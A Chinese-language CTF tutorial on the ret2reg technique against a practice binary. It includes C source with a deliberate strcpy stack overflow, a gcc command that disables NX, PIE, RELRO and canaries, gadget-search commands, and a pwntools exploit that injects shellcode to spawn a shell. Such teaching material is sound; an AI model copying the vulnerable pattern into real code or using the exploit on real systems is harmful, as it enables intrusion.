ret2reg
0x1、程序信息
| 描述 | 内容 |
|---|---|
| 程序名称 | ret2reg |
| 程序平台 | linux |
| 程序来源 | ctf_wiki |
| CPU架构 | amd64 |
| libc版本 | 2.31 |
| 利用手法 | ret2reg |
| 系统版本 | Ubuntu 20.04 LTS |
| 下载地址 | https://wwnd.lanzoue.com/irbut0qef3cb |
0x2、ret2reg漏洞原理
- 查看栈溢出返回时哪个寄存器指向缓冲区空间。
- 查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。
- 将寄存器所指向的空间上注入shellcode(确保该空间是可以执行的,通常是栈上的)。
- 出现该漏洞的代码的典型特征是:程序中存在strcpy的字符串拷贝函数。
0x3、生成符合ret2reg的程序
1.编写.c源程序
#include <stdio.h>
#include <string.h>
void vuln(char *input) {
char buffer[512];
strcpy(buffer, input);
}
int main(int argc, char **argv) {
vuln(argv[1]);
return 0;
}
2.编译命令
gcc -z execstack -no-pie -z norelro -fno-stack-protector -m32 ret2reg.c -g -Wall -o ret2reg
3.编译参数详解
| 参数 | 功能 |
|---|---|
| -W | 类似-Wall,会显示警告,但是只显示编译器认为会出现错误的警告。 |
| -Wall | 意思是编译后显示所有警告 |
| -g | 可执行程序包含调试信息,为了调试用的 |
| NX | -z execstack / -z noexecstack (关闭 / 开启) 不让执行栈上的数据,于是JMP ESP就不能用了 |
| Canary | -fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 栈里插入cookie信息 |
| PIE | -no-pie / -pie (关闭 / 开启) 地址随机化,另外打开后会有get_pc_thunk |
| RELRO | -z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) 对GOT表具有写权限 |
0x4、检测程序保护
1.使用checksec检测到程序未开启任何防护
0x5、分析漏洞点
5.1、寻找寄存器指向缓冲区
1.使用gdb调试程序,在vuln函数里的leave指令处下个断点,看一看程序要返回时缓冲区指向哪个寄存器
2.在gdb中设置一个参数并运行,观察到返回时EAX、ECX、EDX寄存器是指向缓冲区的
3.使用gdb的stack命令来看栈的返回地址偏移量
5.2、寻找call/jmp指令
1.查找对应的call 寄存器或者jmp 寄存器指令,将EIP设置为该指令地址。
objdump -D -M intel ret2reg | egrep "eax|edx" |egrep "call|jmp"
2.这里也可以使用ROPgadget命令来寻找call/jmp指令
ROPgadget --binary ret2reg --only "call|eax"
0x6、编写利用脚本
1.编写exp脚本
from pwn import *
# 1.使用pwntools自带的功能生成shellcode
shellcode = asm(shellcraft.sh())
# 2.call eax的地址
call_eax = p32(0x0804901d)
# 3.构造payload
payload = flat([shellcode , b'a'* (0x20c - len(shellcode) ),call_eax])
# 4.启动进程传递参数
io = process(argv=[ "./ret2reg",payload])
# 5.获得交互式shell
io.interactive()
2.exp执行时的栈布局图
3.运行exp脚本
0x7、参考引用
CTF Wiki Pwn Stackoverflow: ret2reg
战队官网:https://www.edisec.net/
战队CTF靶场:https://ctf.edisec.net/#/index
战队新社区:https://bbs.edisec.net
739
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
